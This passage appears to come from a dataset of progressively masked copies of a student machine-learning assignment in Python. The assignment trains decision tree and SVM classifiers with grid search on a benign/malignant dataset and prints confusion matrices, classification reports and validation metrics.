\n \"\"\"\n print(\n '\\n\\n\\n\\n***************************************************************'\n )\n print('* {} CLASSIFIER'.format(name))\n if params is not None:\n print('\\nHyperparameter: ' + list(params.keys())[0])\n print('Values Tested: {} values from {} to {}'.format(len(list(\n params.values())[0]), min(list(params.values())[0]), max(list(\n params.values())[0])))\n print('\\nWorking...')\n\n\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n\n\ndef plot_grid_search_results(clf):\n param_name = list(clf.param_grid.keys())[0]\n param_vals = list(clf.param_grid.values())[0]\n metrics = clf.scoring\n score_grid = []\n for name in metrics:\n score_grid.append(clf.cv_results_['mean_test_%s' % name])\n p = plt\n idx = 0\n for scores in score_grid:\n p.plot(param_vals, scores, '-', label=metrics[idx])\n idx += 1\n p.title('Hyperparameter Optimization by Cross-Validation')\n p.xlabel(param_name + ' value')\n if param_name == 'gamma':\n p.xscale('log')\n p.ylabel('average test score')\n p.legend(loc='lower right')\n p.grid(True)\n p.show()\n\n\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\ndef prepare_dataset(dataset_path):\n \"\"\" \n Read a comma separated text file where \n\t- the first field is a ID number \n\t- the second field is a class label 'B' or 'M'\n\t- the remaining fields are real-valued\n\n Return two numpy arrays X and y where \n\t- X is two dimensional. X[i,:] is the ith example\n\t- y is one dimensional. y[i] is the class label of X[i,:]\n y[i] should be set to 1 for 'M', and 0 for 'B'\n\n @param dataset_path: full path of the dataset text file\n\n @return\n\tX,y\n \"\"\"\n file_as_array = np.genfromtxt(dataset_path, dtype='str', delimiter=',')\n num_examples = file_as_array.shape[0]\n num_features = file_as_array.shape[1]\n X = np.zeros((num_examples, num_features - 1))\n X[:, 0] = file_as_array.copy()[:, 0]\n X[:, 1:] = file_as_array[:, 2:]\n y = np.zeros_like(file_as_array[:, 1], dtype=int)\n for i in range(len(y)):\n y[i] = file_as_array[i, 1] == 'M'\n return X, y\n\n\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n\n\ndef my_team():\n \"\"\"\n Return the list of the team members of this assignment submission as a list\n of triplet of the form (student_number, first_name, last_name)\n \n \"\"\"\n return [(10155856, 'Mackenzie', 'Wilson'), (10157182, 'Nicole', 'Barritt')]\n\n\n<function token>\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\ndef print_cv_report(r):\n \"\"\"\n Print nicely formatted statistics from GridSearchCV results. This includes\n the mean and std statistics for all scores used (2), on both training and\n test data (known as validation dataset).\n \n @param:\n results: a dict of results from running sklearn.model_selection.cross_validate,\n scored by accuracy, roc_auc, precision and recall. \n \n @return:\n None. Print to console. \n \"\"\"\n score_grid = ['accuracy', 'precision', 'recall', 'f1', 'roc_auc']\n print('\\n\\n- - - VALIDATION REPORT - - -')\n print('\\n{:12} {:10} {:10}'.format('', 'TRAINING', 'VALIDATION'))\n for metric in score_grid:\n print('{:12} {:8.2f} {:12.2f}'.format(metric + ':', np.mean(r[\n 'train_%s' % metric]), np.mean(r['test_%s' % metric])))\n print('\\nMean fit time: {:.6f} seconds'.format(np.mean(r['fit_time'])))\n print('Mean score time: {:.6f} seconds'.format(np.mean(r['score_time'])))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n\n\ndef build_DT_classifier(X_training, y_training):\n \"\"\" \n Build a Decision Tree classifier based on the training set X_training, \n y_training, optimized for the hyperparameters passed.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n dtc: the decision tree classifier built in this function (i.e. a \n GridSearchCV object that is usable exactly as a clf object, but\n allows access to scores from HP optimization)\n \"\"\"\n params = {'max_depth': np.linspace(1, 100, 100, dtype=int)}\n print_clf_intro('DECISION TREE', params)\n dtc = model_selection.GridSearchCV(tree.DecisionTreeClassifier(\n random_state=5), params, return_train_score=True, scoring=[\n 'accuracy', 'roc_auc', 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n dtc.fit(X_training, y_training)\n return dtc\n\n\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. 
\n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef build_SVM_classifier(X_training, y_training):\n \"\"\" \n Build a Support Vector Machine classifier based on the training set X_training, y_training.\n\n @param \n X_training: X_training[i,:] is the ith example\n y_training: y_training[i] is the class label of X_training[i,:]\n\n @return\n svm: the svm classifier built in this function (i.e. a GridSearchCV \n object that is usable exactly as a clf object, but allows access \n to scores from HP optimization)\n \"\"\"\n params = {'gamma': np.logspace(-10, 1, 100)}\n print_clf_intro('SUPPORT VECTOR MACHINE', params)\n svc = model_selection.GridSearchCV(svm.SVC(), params,\n return_train_score=True, scoring=['accuracy', 'roc_auc',\n 'precision', 'recall', 'f1'], refit='roc_auc')\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n svc.fit(X_training, y_training)\n return svc\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc loss:', metrics.log_loss(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('mse:', metrics.mean_squared_error(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('variance:', metrics.\n explained_variance_score(y_true, y_pred)))\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<docstring token>\n<import token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef print_prediction_report(y_pred, y_true, names):\n \"\"\"\n Return a bunch of statistics and metrics reporting the performance of a \n certain classifier model on the given training data. \n \n @param:\n y_true: A np-array of the target class labels as integers\n y_pred: A np-array of the classifier-predicted class labels as integers\n names: A tuple of the class labels (str), corresponding to (1,0) \n binary integer class labels\n \n @return:\n None. Print to console. \n \"\"\"\n labels = 1, 0\n print('\\nConfusion Matrix:')\n cm = metrics.confusion_matrix(y_true, y_pred, labels)\n assert len(names) == len(cm)\n assert cm.shape == (2, 2)\n print('{:14} {:10} {:10} {:3}'.format('PREDICTED:', names[0], names[1],\n 'All'))\n print('ACTUAL: ')\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[0], '(TP)', cm\n [0, 0], '', '(FN)', cm[0, 1], sum(cm[0])))\n print('{:14} {:3} {:3} {:1} {:2} {:3} {:5}'.format(names[1], '(FP)', cm\n [1, 0], '', '(TN)', cm[1, 1], sum(cm[1])))\n print('{:14} {:8} {:10} {:5}'.format('All', sum(cm[:, 0]), sum(cm[:, 1]\n ), sum(sum(cm))))\n print('\\nClassification Report:')\n print(metrics.classification_report(y_true, y_pred, labels,\n target_names=names))\n print('\\nOverall Metrics:')\n print('{:14} {:.2f}'.format('accuracy:', metrics.accuracy_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('roc_auc:', metrics.roc_auc_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('precision:', metrics.precision_score(\n y_true, y_pred)))\n print('{:14} {:.2f}'.format('recall:', metrics.recall_score(y_true,\n y_pred)))\n print('{:14} {:.2f}'.format('f1:', metrics.f1_score(y_true, y_pred)))\n print('{:14} {:.2f}'.format('lgrthmc 